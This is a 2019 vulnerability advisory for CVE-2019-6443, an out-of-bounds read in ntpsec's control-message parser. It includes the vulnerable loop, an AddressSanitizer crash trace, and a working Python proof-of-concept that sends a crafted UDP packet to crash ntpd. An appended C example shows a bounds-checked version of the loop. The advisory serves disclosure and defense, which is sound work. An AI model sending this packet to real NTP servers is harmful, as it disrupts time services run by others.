2019-01-15

Out-of-bounds read in ntpsec
============================

CVE-2019-6443

This is the first of four bugs. For more visit: https://dumpco.re/blog/ntpsec-bugs

An out-of-bounds read bug was found in ntpsec.

Affected versions: ntpsec 1.1.1, 1.1.2

# Timeline

2018-10-15 Bug discovered
2018-10-16 Bug reported
2019-01-13 Vendor released patch version 1.1.3
2019-01-16 MITRE allocated CVE-2019-6443

# Details

The bug is in ctl_getitem in ntpd/ntp_control.c (line numbers below match the ASan trace in the crash report). Code snippet:

    2539     /* Scan the string in the packet until we hit comma or
    2540      * EoB. Register position of first '=' on the fly. */
    2541     for (tp = NULL, cp = reqpt; cp != reqend; ++cp) {   // <-- cp incremented out of bounds
    2542         if (*cp == '=' && tp == NULL)                    // <-- cp dereferenced, reading uninitialised data
    2543             tp = cp;
    2544         if (*cp == ',')
    2545             break;
    2546     }

# Crash report

    # uname -a
    Linux h4xb0x 3.16.0-7-amd64 #1 SMP Debian 3.16.59-1 (2018-10-03) x86_64 GNU/Linux

    # sha256sum ../../bug1
    a3e54a033eea3c3f0a5c795aaa0d8c8b3f4cbb013760e3b1865afb20eb4347b0  ../../bug1

    # base64 ../../bug1

    # ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer-3.5 ./build/main/ntpd/ntpd -n & sleep 1; cat ../../bug1 > /dev/udp/127.0.0.1/5123
    2018-10-16T20:36:59 ntpd[18249]: INIT: ntpd ntpsec-1.1.2 2018-10-15T18:34:38Z: Starting
    2018-10-16T20:36:59 ntpd[18249]: INIT: Command line: ./build/main/ntpd/ntpd -n
    2018-10-16T20:36:59 ntpd[18249]: INIT: precision = 0.131 usec (-23)
    2018-10-16T20:36:59 ntpd[18249]: INIT: successfully locked into RAM
    2018-10-16T20:36:59 ntpd[18249]: CONFIG: readconfig: parsing file: /etc/ntp.conf
    restrict 0.0.0.0: KOD does nothing without LIMITED.
    2018-10-16T20:36:59 ntpd[18249]: CONFIG: restrict 0.0.0.0: KOD does nothing without LIMITED.
    2018-10-16T20:36:59 ntpd[18249]: CONFIG: restrict 0.0.0.0: notrap keyword is ignored.
    restrict ::: KOD does nothing without LIMITED.
    2018-10-16T20:36:59 ntpd[18249]: CONFIG: restrict ::: KOD does nothing without LIMITED.
    2018-10-16T20:36:59 ntpd[18249]: CONFIG: restrict ::: notrap keyword is ignored.
    2018-10-16T20:36:59 ntpd[18249]: INIT: Using SO_TIMESTAMPNS
    2018-10-16T20:36:59 ntpd[18249]: IO: Listen and drop on 0 v6wildcard [::]:5123
    2018-10-16T20:36:59 ntpd[18249]: IO: Listen and drop on 1 v4wildcard 0.0.0.0:5123
    2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 2 lo 127.0.0.1:5123
    2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 3 eth0 192.168.245.220:5123
    2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 4 eth0 192.168.245.131:5123
    2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 5 lo [::1]:5123
    2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 6 eth0 [fe80::50:56ff:fe38:d7b8%2]:5123
    2018-10-16T20:36:59 ntpd[18249]: IO: Listening on routing socket on fd #23 for interface updates
    2018-10-16T20:36:59 ntpd[18249]: statistics directory /var/NTP/ does not exist or is unwriteable, error No such file or directory
    =================================================================
    ==18249==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd426ef680 at pc 0x55b2240a8d45 bp 0x7ffd426ee9b0 sp 0x7ffd426ee9a8
    READ of size 1 at 0x7ffd426ef680 thread T0
    root@h4xb0x:/home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2#
        #0 0x55b2240a8d44 in ctl_getitem /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:2542:7
        #1 0x55b22409b636 in read_sysvars /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:2804:22
        #2 0x55b22409b636 in read_variables /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:2866
        #3 0x55b22409767c in process_control /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:898:4
        #4 0x55b22406991b in receive /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_proto.c:676:3
        #5 0x55b22408695e in mainloop /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntpd.c:982:6
        #6 0x55b22408695e in ntpdmain /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntpd.c:911
        #7 0x55b22408695e in main /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntpd.c:426
        #8 0x7f5b8a657b44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287
        #9 0x55b22403a48c in _start (/home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/ntpd/ntpd+0x10348c)

    Address 0x7ffd426ef680 is located in stack of thread T0 at offset 576 in frame
        #0 0x55b2240964bf in process_control /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:768

      This frame has 1 object(s):
        [32, 576) 'pkt_core' <== Memory access at offset 576 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:2542 ctl_getitem
    Shadow bytes around the buggy address:
      0x1000284d5e80: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
      0x1000284d5e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x1000284d5ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x1000284d5eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x1000284d5ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x1000284d5ed0:[f3]f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
      0x1000284d5ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x1000284d5ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x1000284d5f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x1000284d5f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x1000284d5f20: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      ASan internal:           fe
    ==18249==ABORTING

# Proof of concept exploit

    #!/usr/bin/env python
    # Python 2: string literals are byte strings, so buf goes on the wire as raw bytes.
    import sys
    import socket

    # The crafted control-request packet (same bytes as the bug1 file above).
    buf = ("\x4e\x02\x03\xec\x00\x00\x00\x00\x00\x00\x02\xc7\x74\x63\x3d\x10" +
           "\x00\xaf\x2c\x2c\x2c\x2c\xfa\x00\x00\xfa\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x14\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x21\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b" +
           "\xce\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\xe4\xe4\xe5\x0b\x0b" +
           "\x0b\x0b\x20\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x3d\x63\x3d\xac\x0b\x0b" +
           "\x0b\x0b\x2d\x27\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x80\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\xff\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b"
           + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x02\x0b\x0b\x0b\x0b\x0b\x18\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x00\x00\x00\x02\xc7\x74\x63\x3d\x10\x00\xaf\x2c\x2c" +
           "\x2c\x2c\xfa\x00\x00\xfa\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x14\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x21\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\xe4\xe4\xe5\x0b\x0b\x0b\x0b\x20\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x3d\x63\x3d\xac\x0b\x0b\x0b\x0b\x2d\x27" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x80\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\xff\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x02\x0b\x0b\x0b\x0b\x0b\x18\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0e\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x4b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x3b\xa9\x48\xdd\x00\x04\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0e\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x4b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x3b\xa9\x48\xdd\x00\x04\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
           "\x0b\x07")

    # Send the packet as a single UDP datagram to the NTP port.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(buf, ('127.0.0.1', 123))

# Proof of discovery

    $ base64 bug1
    $ sha256sum bug1
    a3e54a033eea3c3f0a5c795aaa0d8c8b3f4cbb013760e3b1865afb20eb4347b0  bug1

https://twitter.com/magnusstubman/status/1051893954705264641

# References

- ftp://ftp.ntpsec.org/pub/releases/
- https://gitlab.com/NTPsec/ntpsec/issues/507
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6443
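As an added illustration of the loop quoted in the Details section (this is example code, not ntpsec's own code and not the 1.1.3 fix): a bounds-checked version of the field scan, run over a constructed control-request payload. The function name scan_field and its buf/buflen/off/len interface are assumptions made for this example.

```c
#include <stddef.h>
#include <string.h>

/* Bounds-checked version of the field scan quoted from ctl_getitem.
 * The original loop stops only when cp == reqend, so if reqend was
 * derived from an attacker-supplied count and lies past the real packet
 * buffer, or reqpt already sits past reqend, every iteration reads
 * outside the buffer (the stack-buffer-overflow in the report). Here the
 * claimed region is clamped to the buffer before any byte is read and
 * the loop compares with '<' rather than '!='.
 *
 * buf/buflen: the real packet buffer; off/len: the request's claimed
 * field region (names are assumptions for this example). Returns the
 * byte count up to, not including, the comma or the end of the clamped
 * region; stores the offset of the first '=' in *eq (-1 if none);
 * returns -1 if the cursor already lies past the buffer end. */
ptrdiff_t scan_field(const char *buf, size_t buflen, size_t off, size_t len,
                     ptrdiff_t *eq)
{
    const char *reqpt, *reqend, *cp, *tp = NULL;

    if (buf == NULL || off > buflen)
        return -1;              /* reqpt would be beyond reqend: refuse */
    if (len > buflen - off)
        len = buflen - off;     /* claimed length exceeds buffer: clamp */
    reqpt  = buf + off;
    reqend = reqpt + len;       /* never beyond buf + buflen */

    for (cp = reqpt; cp < reqend; ++cp) {   /* '<' keeps cp in range */
        if (*cp == '=' && tp == NULL)
            tp = cp;
        if (*cp == ',')
            break;
    }
    *eq = (tp == NULL) ? -1 : (tp - reqpt);
    return cp - reqpt;
}

int main(void)
{
    /* constructed sample: the name=value text that follows the control
     * header, with a claimed length far larger than the buffer */
    const char pkt[] = "leap=0,stratum=2";
    ptrdiff_t eq;
    ptrdiff_t used = scan_field(pkt, strlen(pkt), 0, 4096, &eq);

    return (used == 6 && eq == 4) ? 0 : 1;   /* stops at ',', '=' at 4 */
}
```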